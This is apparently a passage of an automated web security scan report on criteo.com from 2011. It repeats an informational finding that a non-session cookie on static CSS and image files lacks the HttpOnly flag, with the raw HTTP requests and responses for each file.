Host:	http://www.criteo.com
Path:	/templates/criteo/css/main.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

240plan=R1146701318; path=/; expires=Wed, 18-May-2011 05:10:10 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /templates/criteo/css/main.css HTTP/1.1
Host: www.criteo.com
Proxy-Connection: keep-alive
Referer: http://www.criteo.com/index.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=94712387.1305478412.1.1.utmcsr=US_InsideFB|utmccn=InsideFB_US|utmcmd=display; __utma=94712387.631168667.1305478412.1305478412.1305478412.1; __utmc=94712387; __utmb=94712387.3.10.1305478412; 240plan=R1146701318; 0ecea38193df0c9bab184bf1b140820e=3c4941b52ae17188bef1bb9b7eb39f0c; jfcookie[lang]=us

Response

HTTP/1.1 200 OK
Set-Cookie: 240plan=R1146701318; path=/; expires=Wed, 18-May-2011 05:10:10 GMT
Date: Sun, 15 May 2011 16:55:30 GMT
Server: Apache/2.2.X (OVH)
Last-Modified: Tue, 29 Mar 2011 19:47:10 GMT
Accept-Ranges: bytes
Content-Length: 17690
Content-Type: text/css

html
{
   overflow-y: scroll;
}

body, div, form, img, h1, h2, h3, h4, h5, h6, p, ul, ul li, table, th, td
{
   margin: 0;
   padding: 0;
   border: 0;
   color: #393939;
   font-family: Arial, Helveti
...[SNIP]...

11.70. http://www.criteo.com/templates/criteo/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.criteo.com
Path:	/templates/criteo/favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

240plan=R1146701318; path=/; expires=Wed, 18-May-2011 05:10:09 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /templates/criteo/favicon.ico HTTP/1.1
Host: www.criteo.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=94712387.1305478412.1.1.utmcsr=US_InsideFB|utmccn=InsideFB_US|utmcmd=display; 0ecea38193df0c9bab184bf1b140820e=3c4941b52ae17188bef1bb9b7eb39f0c; jfcookie[lang]=us; __utma=94712387.631168667.1305478412.1305478412.1305478412.1; __utmc=94712387; __utmb=94712387.4.10.1305478412; _msuuid_3q33h24lt0=AAAC8760-789E-44B5-9893-D69A4ABE0C29; 240plan=R1146701318; uid=c4f44b7e-9074-47a2-bdf0-9dda4e9d5fa4; udc=*185VYQmJaGc9Pbb0uixlNCg%3d%3d; udi=*1EcK4QbIrRJZ1FL8HJtZrhg%3d%3d; uic=*1pUmfVuDyajt9O4WEaS8BV46KbWDomBQLYE3hw8Ewhw61Lez9RiRcRS4%2btxo4BvmZ

Response

HTTP/1.1 200 OK
Set-Cookie: 240plan=R1146701318; path=/; expires=Wed, 18-May-2011 05:10:09 GMT
Date: Sun, 15 May 2011 16:56:29 GMT
Server: Apache/2.2.X (OVH)
Last-Modified: Tue, 18 May 2010 18:26:09 GMT
Accept-Ranges: bytes
Content-Length: 1150
Content-Type: image/vnd.microsoft.icon

............ .h.......(....... ..... .............................................................................................................`...(...............7.................................
...[SNIP]...

11.71. http://www.criteo.com/templates/criteo/images/backgrounds/button.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.criteo.com
Path:	/templates/criteo/images/backgrounds/button.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

240plan=R1146701318; path=/; expires=Wed, 18-May-2011 05:10:09 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /templates/criteo/images/backgrounds/button.gif HTTP/1.1
Host: www.criteo.com
Proxy-Connection: keep-alive
Referer: http://www.criteo.com/index.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=94712387.1305478412.1.1.utmcsr=US_InsideFB|utmccn=InsideFB_US|utmcmd=display; 0ecea38193df0c9bab184bf1b140820e=3c4941b52ae17188bef1bb9b7eb39f0c; jfcookie[lang]=us; 240plan=R1146701318; __utma=94712387.631168667.1305478412.1305478412.1305478412.1; __utmc=94712387; __utmb=94712387.4.10.1305478412

Response

HTTP/1.1 200 OK
Set-Cookie: 240plan=R1146701318; path=/; expires=Wed, 18-May-2011 05:10:09 GMT
Date: Sun, 15 May 2011 16:55:51 GMT
Server: Apache/2.2.X (OVH)
Last-Modified: Tue, 18 May 2010 18:27:03 GMT
Accept-Ranges: bytes
Content-Length: 239
Content-Type: image/gif

GIF89a..............~...............................}.....Y...........|.....................................,..........t.#.di.Q..l.Jp.Kr\....|....ax(.....(L...(4..R...d..z...x,...e2c.f.........v:>/P.
...[SNIP]...

11.72. http://www.criteo.com/templates/criteo/images/backgrounds/dropdown_left.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.criteo.com
Path:	/templates/criteo/images/backgrounds/dropdown_left.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

240plan=R1146701318; path=/; expires=Wed, 18-May-2011 05:10:09 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /templates/criteo/images/backgrounds/dropdown_left.gif HTTP/1.1
Host: www.criteo.com
Proxy-Connection: keep-alive
Referer: http://www.criteo.com/index.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=94712387.1305478412.1.1.utmcsr=US_InsideFB|utmccn=InsideFB_US|utmcmd=display; 0ecea38193df0c9bab184bf1b140820e=3c4941b52ae17188bef1bb9b7eb39f0c; jfcookie[lang]=us; 240plan=R1146701318; __utma=94712387.631168667.1305478412.1305478412.1305478412.1; __utmc=94712387; __utmb=94712387.4.10.1305478412

Response

HTTP/1.1 200 OK
Set-Cookie: 240plan=R1146701318; path=/; expires=Wed, 18-May-2011 05:10:09 GMT
Date: Sun, 15 May 2011 16:55:40 GMT
Server: Apache/2.2.X (OVH)
Last-Modified: Tue, 18 May 2010 18:27:05 GMT
Accept-Ranges: bytes
Content-Length: 109
Content-Type: image/gif

GIF89a........'..#...........k.....T..v..2..................!......,...........p.F.*..L.J\...8.U.....j....;

11.73. http://www.criteo.com/templates/criteo/images/backgrounds/dropdown_right.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.criteo.com
Path:	/templates/criteo/images/backgrounds/dropdown_right.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

240plan=R1146701318; path=/; expires=Wed, 18-May-2011 05:10:10 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /templates/criteo/images/backgrounds/dropdown_right.gif HTTP/1.1
Host: www.criteo.com
Proxy-Connection: keep-alive
Referer: http://www.criteo.com/index.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=94712387.1305478412.1.1.utmcsr=US_InsideFB|utmccn=InsideFB_US|utmcmd=display; 0ecea38193df0c9bab184bf1b140820e=3c4941b52ae17188bef1bb9b7eb39f0c; jfcookie[lang]=us; 240plan=R1146701318; __utma=94712387.631168667.1305478412.1305478412.1305478412.1; __utmc=94712387; __utmb=94712387.4.10.1305478412

Response

HTTP/1.1 200 OK
Set-Cookie: 240plan=R1146701318; path=/; expires=Wed, 18-May-2011 05:10:10 GMT
Date: Sun, 15 May 2011 16:55:40 GMT
Server: Apache/2.2.X (OVH)
Last-Modified: Tue, 18 May 2010 18:27:05 GMT
Accept-Ranges: bytes
Content-Length: 207
Content-Type: image/gif

GIF89a....................k.....v..#..2..T..'...............!......,..........|..I..8....`(.di.h..l.....tm.x..|.....H,....r......tJ.Z.+....z....VXp...z..&..s{N.....!..7..............................
...[SNIP]...

11.74. http://www.criteo.com/templates/criteo/images/backgrounds/footer.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.criteo.com
Path:	/templates/criteo/images/backgrounds/footer.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

240plan=R1146701318; path=/; expires=Wed, 18-May-2011 05:10:10 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /templates/criteo/images/backgrounds/footer.gif HTTP/1.1
Host: www.criteo.com
Proxy-Connection: keep-alive
Referer: http://www.criteo.com/index.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=94712387.1305478412.1.1.utmcsr=US_InsideFB|utmccn=InsideFB_US|utmcmd=display; 0ecea38193df0c9bab184bf1b140820e=3c4941b52ae17188bef1bb9b7eb39f0c; jfcookie[lang]=us; 240plan=R1146701318; __utma=94712387.631168667.1305478412.1305478412.1305478412.1; __utmc=94712387; __utmb=94712387.4.10.1305478412

Response

HTTP/1.1 200 OK
Set-Cookie: 240plan=R1146701318; path=/; expires=Wed, 18-May-2011 05:10:10 GMT
Date: Sun, 15 May 2011 16:55:54 GMT
Server: Apache/2.2.X (OVH)
Last-Modified: Tue, 18 May 2010 18:27:06 GMT
Accept-Ranges: bytes
Content-Length: 275
Content-Type: image/gif

GIF89a........."..$.....E..p.........!.......,...........h...0.I..8....`(.di.h..l..p,..0.E0.t....pH,....r.l>...T
8...v..z...X+.N...x.n....|N....A}........48xS.........................................
...[SNIP]...

11.75. http://www.criteo.com/templates/criteo/images/backgrounds/graybox_bottomleft.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.criteo.com
Path:	/templates/criteo/images/backgrounds/graybox_bottomleft.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

240plan=R1146701318; path=/; expires=Wed, 18-May-2011 05:10:09 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /templates/criteo/images/backgrounds/graybox_bottomleft.gif HTTP/1.1
Host: www.criteo.com
Proxy-Connection: keep-alive
Referer: http://www.criteo.com/index.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=94712387.1305478412.1.1.utmcsr=US_InsideFB|utmccn=InsideFB_US|utmcmd=display; 0ecea38193df0c9bab184bf1b140820e=3c4941b52ae17188bef1bb9b7eb39f0c; jfcookie[lang]=us; 240plan=R1146701318; __utma=94712387.631168667.1305478412.1305478412.1305478412.1; __utmc=94712387; __utmb=94712387.4.10.1305478412

Response

HTTP/1.1 200 OK
Set-Cookie: 240plan=R1146701318; path=/; expires=Wed, 18-May-2011 05:10:09 GMT
Date: Sun, 15 May 2011 16:55:51 GMT
Server: Apache/2.2.X (OVH)
Last-Modified: Tue, 18 May 2010 18:27:06 GMT
Accept-Ranges: bytes
Content-Length: 102
Content-Type: image/gif

GIF89a..... .................................................!..... .,.............D.......U... &.qD.;

11.76. http://www.criteo.com/templates/criteo/images/backgrounds/graybox_bottomright.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.criteo.com
Path:	/templates/criteo/images/backgrounds/graybox_bottomright.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

240plan=R1146701318; path=/; expires=Wed, 18-May-2011 05:10:10 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /templates/criteo/images/backgrounds/graybox_bottomright.gif HTTP/1.1
Host: www.criteo.com
Proxy-Connection: keep-alive
Referer: http://www.criteo.com/index.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=94712387.1305478412.1.1.utmcsr=US_InsideFB|utmccn=InsideFB_US|utmcmd=display; 0ecea38193df0c9bab184bf1b140820e=3c4941b52ae17188bef1bb9b7eb39f0c; jfcookie[lang]=us; 240plan=R1146701318; __utma=94712387.631168667.1305478412.1305478412.1305478412.1; __utmc=94712387; __utmb=94712387.4.10.1305478412

Response

HTTP/1.1 200 OK
Set-Cookie: 240plan=R1146701318; path=/; expires=Wed, 18-May-2011 05:10:10 GMT
Date: Sun, 15 May 2011 16:55:51 GMT
Server: Apache/2.2.X (OVH)
Last-Modified: Tue, 18 May 2010 18:27:06 GMT
Accept-Ranges: bytes
Content-Length: 229
Content-Type: image/gif

GIF89a..... .................................................!..... .,.............I..8....`(.di.h..l..p,.tm.x..<&...pH,....r.l:......Z...v..z...85.....z.n......H....~....N...u .......................
...[SNIP]...

11.77. http://www.criteo.com/templates/criteo/images/backgrounds/graybox_topleft.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.criteo.com
Path:	/templates/criteo/images/backgrounds/graybox_topleft.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

240plan=R1146701318; path=/; expires=Wed, 18-May-2011 05:10:09 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /templates/criteo/images/backgrounds/graybox_topleft.gif HTTP/1.1
Host: www.criteo.com
Proxy-Connection: keep-alive
Referer: http://www.criteo.com/index.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=94712387.1305478412.1.1.utmcsr=US_InsideFB|utmccn=InsideFB_US|utmcmd=display; 0ecea38193df0c9bab184bf1b140820e=3c4941b52ae17188bef1bb9b7eb39f0c; jfcookie[lang]=us; 240plan=R1146701318; __utma=94712387.631168667.1305478412.1305478412.1305478412.1; __utmc=94712387; __utmb=94712387.4.10.1305478412

Response

HTTP/1.1 200 OK
Set-Cookie: 240plan=R1146701318; path=/; expires=Wed, 18-May-2011 05:10:09 GMT
Date: Sun, 15 May 2011 16:55:51 GMT
Server: Apache/2.2.X (OVH)
Last-Modified: Tue, 18 May 2010 18:27:07 GMT
Accept-Ranges: bytes
Content-Length: 102
Content-Type: image/gif

GIF89a..... .................................................!..... .,...........0Ib.4%.d..D.}.0".pF.;

11.78. http://www.criteo.com/templates/criteo/images/backgrounds/graybox_topright.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.criteo.com
Path:	/templates/criteo/images/backgrounds/graybox_topright.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

240plan=R1146701318; path=/; expires=Wed, 18-May-2011 05:10:10 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /templates/criteo/images/backgrounds/graybox_topright.gif HTTP/1.1
Host: www.criteo.com
Proxy-Connection: keep-alive
Referer: http://www.criteo.com/index.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=94712387.1305478412.1.1.utmcsr=US_InsideFB|utmccn=InsideFB_US|utmcmd=display; 0ecea38193df0c9bab184bf1b140820e=3c4941b52ae17188bef1bb9b7eb39f0c; jfcookie[lang]=us; 240plan=R1146701318; __utma=94712387.631168667.1305478412.1305478412.1305478412.1; __utmc=94712387; __utmb=94712387.4.10.1305478412

Response

HTTP/1.1 200 OK
Set-Cookie: 240plan=R1146701318; path=/; expires=Wed, 18-May-2011 05:10:10 GMT
Date: Sun, 15 May 2011 16:55:51 GMT
Server: Apache/2.2.X (OVH)
Last-Modified: Tue, 18 May 2010 18:27:08 GMT
Accept-Ranges: bytes
Content-Length: 228
Content-Type: image/gif

GIF89a..... .................................................!..... .,.............I..8....`(.di.h..l..p,.tm.x..|... bH,....r.l:...tJ.Z...v..z...xL.....z.n....@......~..........b.s..............Z.....
...[SNIP]...

11.79. http://www.criteo.com/templates/criteo/images/backgrounds/languages.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.criteo.com
Path:	/templates/criteo/images/backgrounds/languages.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

240plan=R1146701318; path=/; expires=Wed, 18-May-2011 05:10:09 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /templates/criteo/images/backgrounds/languages.gif HTTP/1.1
Host: www.criteo.com
Proxy-Connection: keep-alive
Referer: http://www.criteo.com/index.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=94712387.1305478412.1.1.utmcsr=US_InsideFB|utmccn=InsideFB_US|utmcmd=display; 0ecea38193df0c9bab184bf1b140820e=3c4941b52ae17188bef1bb9b7eb39f0c; jfcookie[lang]=us; 240plan=R1146701318; __utma=94712387.631168667.1305478412.1305478412.1305478412.1; __utmc=94712387; __utmb=94712387.4.10.1305478412

Response

HTTP/1.1 200 OK
Set-Cookie: 240plan=R1146701318; path=/; expires=Wed, 18-May-2011 05:10:09 GMT
Date: Sun, 15 May 2011 16:55:35 GMT
Server: Apache/2.2.X (OVH)
Last-Modified: Tue, 18 May 2010 18:27:12 GMT
Accept-Ranges: bytes
Content-Length: 105
Content-Type: image/gif

GIF89a.......................................................!.......,................h.q....(.".
I.@.D.;

11.80. http://www.criteo.com/templates/criteo/images/backgrounds/languages_wrapper.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.criteo.com
Path:	/templates/criteo/images/backgrounds/languages_wrapper.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

240plan=R1146701318; path=/; expires=Wed, 18-May-2011 05:10:10 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /templates/criteo/images/backgrounds/languages_wrapper.gif HTTP/1.1
Host: www.criteo.com
Proxy-Connection: keep-alive
Referer: http://www.criteo.com/index.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=94712387.1305478412.1.1.utmcsr=US_InsideFB|utmccn=InsideFB_US|utmcmd=display; 0ecea38193df0c9bab184bf1b140820e=3c4941b52ae17188bef1bb9b7eb39f0c; jfcookie[lang]=us; 240plan=R1146701318; __utma=94712387.631168667.1305478412.1305478412.1305478412.1; __utmc=94712387; __utmb=94712387.4.10.1305478412

Response

HTTP/1.1 200 OK
Set-Cookie: 240plan=R1146701318; path=/; expires=Wed, 18-May-2011 05:10:10 GMT
Date: Sun, 15 May 2011 16:55:35 GMT
Server: Apache/2.2.X (OVH)
Last-Modified: Tue, 18 May 2010 18:27:13 GMT
Accept-Ranges: bytes
Content-Length: 3276
Content-Type: image/gif

GIF89a..................................................................................................................................................................................................
...[SNIP]...

11.81. http://www.criteo.com/templates/criteo/images/backgrounds/mainmenu_left.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.criteo.com
Path:	/templates/criteo/images/backgrounds/mainmenu_left.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

240plan=R1146701318; path=/; expires=Wed, 18-May-2011 05:10:09 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /templates/criteo/images/backgrounds/mainmenu_left.gif HTTP/1.1
Host: www.criteo.com
Proxy-Connection: keep-alive
Referer: http://www.criteo.com/index.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=94712387.1305478412.1.1.utmcsr=US_InsideFB|utmccn=InsideFB_US|utmcmd=display; 0ecea38193df0c9bab184bf1b140820e=3c4941b52ae17188bef1bb9b7eb39f0c; jfcookie[lang]=us; 240plan=R1146701318; __utma=94712387.631168667.1305478412.1305478412.1305478412.1; __utmc=94712387; __utmb=94712387.4.10.1305478412

Response

HTTP/1.1 200 OK
Set-Cookie: 240plan=R1146701318; path=/; expires=Wed, 18-May-2011 05:10:09 GMT
Date: Sun, 15 May 2011 16:55:40 GMT
Server: Apache/2.2.X (OVH)
Last-Modified: Tue, 18 May 2010 18:27:13 GMT
Accept-Ranges: bytes
Content-Length: 939
Content-Type: image/gif

GIF89a..8........................................rrr...}}}..............".......................k..K..%..................../..`.........................................................................
...[SNIP]...

11.82. http://www.criteo.com/templates/criteo/images/backgrounds/mainmenu_right.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.criteo.com
Path:	/templates/criteo/images/backgrounds/mainmenu_right.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

240plan=R1146701318; path=/; expires=Wed, 18-May-2011 05:10:09 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /templates/criteo/images/backgrounds/mainmenu_right.gif HTTP/1.1
Host: www.criteo.com
Proxy-Connection: keep-alive
Referer: http://www.criteo.com/index.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=94712387.1305478412.1.1.utmcsr=US_InsideFB|utmccn=InsideFB_US|utmcmd=display; 0ecea38193df0c9bab184bf1b140820e=3c4941b52ae17188bef1bb9b7eb39f0c; jfcookie[lang]=us; 240plan=R1146701318; __utma=94712387.631168667.1305478412.1305478412.1305478412.1; __utmc=94712387; __utmb=94712387.4.10.1305478412

Response

HTTP/1.1 200 OK
Set-Cookie: 240plan=R1146701318; path=/; expires=Wed, 18-May-2011 05:10:09 GMT
Date: Sun, 15 May 2011 16:55:40 GMT
Server: Apache/2.2.X (OVH)
Last-Modified: Tue, 18 May 2010 18:27:13 GMT
Accept-Ranges: bytes
Content-Length: 364
Content-Type: image/gif

GIF89a..8.............rrr............}}}........................../.....`........"..%...................................K.....k.........................................................................
...[SNIP]...

11.83. http://www.criteo.com/templates/criteo/images/backgrounds/orangebox_bottomleft.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.criteo.com
Path:	/templates/criteo/images/backgrounds/orangebox_bottomleft.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

240plan=R1146701318; path=/; expires=Wed, 18-May-2011 05:10:09 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /templates/criteo/images/backgrounds/orangebox_bottomleft.gif HTTP/1.1
Host: www.criteo.com
Proxy-Connection: keep-alive
Referer: http://www.criteo.com/index.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=94712387.1305478412.1.1.utmcsr=US_InsideFB|utmccn=InsideFB_US|utmcmd=display; 0ecea38193df0c9bab184bf1b140820e=3c4941b52ae17188bef1bb9b7eb39f0c; jfcookie[lang]=us; 240plan=R1146701318; __utma=94712387.631168667.1305478412.1305478412.1305478412.1; __utmc=94712387; __utmb=94712387.4.10.1305478412

Response

HTTP/1.1 200 OK
Set-Cookie: 240plan=R1146701318; path=/; expires=Wed, 18-May-2011 05:10:09 GMT
Date: Sun, 15 May 2011 16:55:49 GMT
Server: Apache/2.2.X (OVH)
Last-Modified: Tue, 18 May 2010 18:27:14 GMT
Accept-Ranges: bytes
Content-Length: 102
Content-Type: image/gif

GIF89a............ .....!........H.....].....................!.......,............$EU.U...!..!B"..PD.;

11.84. http://www.criteo.com/templates/criteo/images/backgrounds/orangebox_bottomright.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.criteo.com
Path:	/templates/criteo/images/backgrounds/orangebox_bottomright.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

240plan=R1146701318; path=/; expires=Wed, 18-May-2011 05:10:10 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /templates/criteo/images/backgrounds/orangebox_bottomright.gif HTTP/1.1
Host: www.criteo.com
Proxy-Connection: keep-alive
Referer: http://www.criteo.com/index.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=94712387.1305478412.1.1.utmcsr=US_InsideFB|utmccn=InsideFB_US|utmcmd=display; 0ecea38193df0c9bab184bf1b140820e=3c4941b52ae17188bef1bb9b7eb39f0c; jfcookie[lang]=us; 240plan=R1146701318; __utma=94712387.631168667.1305478412.1305478412.1305478412.1; __utmc=94712387; __utmb=94712387.4.10.1305478412

Response

HTTP/1.1 200 OK
Set-Cookie: 240plan=R1146701318; path=/; expires=Wed, 18-May-2011 05:10:10 GMT
Date: Sun, 15 May 2011 16:55:49 GMT
Server: Apache/2.2.X (OVH)
Last-Modified: Tue, 18 May 2010 18:27:15 GMT
Accept-Ranges: bytes
Content-Length: 229
Content-Type: image/gif

GIF89a............H.....].....!.. ...........................!.......,...........P.I..8....`(.di.h..l..p,.tm.x..<&$..pH,....r.l:....`.Z...v..z...85.....z.n......X....~....N...u. ......................
...[SNIP]...

11.85. http://www.criteo.com/templates/criteo/images/backgrounds/orangebox_topleft.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.criteo.com
Path:	/templates/criteo/images/backgrounds/orangebox_topleft.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

240plan=R1146701318; path=/; expires=Wed, 18-May-2011 05:10:09 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /templates/criteo/images/backgrounds/orangebox_topleft.gif HTTP/1.1
Host: www.criteo.com
Proxy-Connection: keep-alive
Referer: http://www.criteo.com/index.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=94712387.1305478412.1.1.utmcsr=US_InsideFB|utmccn=InsideFB_US|utmcmd=display; 0ecea38193df0c9bab184bf1b140820e=3c4941b52ae17188bef1bb9b7eb39f0c; jfcookie[lang]=us; 240plan=R1146701318; __utma=94712387.631168667.1305478412.1305478412.1305478412.1; __utmc=94712387; __utmb=94712387.4.10.1305478412

Response

